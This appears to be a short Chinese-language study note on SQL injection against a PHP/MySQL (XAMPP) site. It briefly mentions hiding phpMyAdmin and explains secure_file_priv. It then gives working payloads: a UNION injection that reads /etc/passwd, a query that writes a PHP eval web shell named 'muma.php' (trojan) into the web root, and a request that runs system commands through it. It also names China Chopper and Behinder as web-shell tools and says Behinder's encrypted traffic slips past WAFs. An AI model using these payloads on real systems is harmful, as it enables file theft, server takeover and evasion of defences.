3.SQL注入-查询漏洞二

一.不要开启phpmyadmin

1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf

 2.修改phpmyadmin目录名称为不容易猜测的

 

二.SQL注入-文件读写以及木马植入

1.读写权限确认

 secure_file_priv = 空的时候，任意读写

 secure_file_priv = 某个路径的时候，只能在那个路径下读写

 secure_file_priv = NULL，不能读写

 #利用SQL语句读取系统文件

 -1 union select 1,2,3,load_file("/etc/passwd"),5

 select load_file("/opt/lampp/htdocs/security/common.php") 

 #利用SQL语句写入系统文件
 
 select "hello world" into outfile "/opt/lampp/htdocs/security/muma.php"
 
 -1 union select 1,2,3,"<?php @eval($_GET['a']);?>",5 
 into outfile "/opt/lampp/htdocs/security/muma.php"

 #访问muma.php执行指令
 muma.php?a=system("ifconfig");

三.中国菜刀

1.提前上传了木马

2.请求必须为POST类型，参数自定义

3.传输过程为明文传输，目前已经被WAF给拦截了

 

四.Behinder冰蝎

1.冰蝎是加密传输，防火墙很难分析出流量特征，比较容易绕开WAF

需要先上传一个冰蝎自己带加密解密功能的web shell

a=system("echo "<?php" >> /opt/lampp/htdocs/security/muma.php");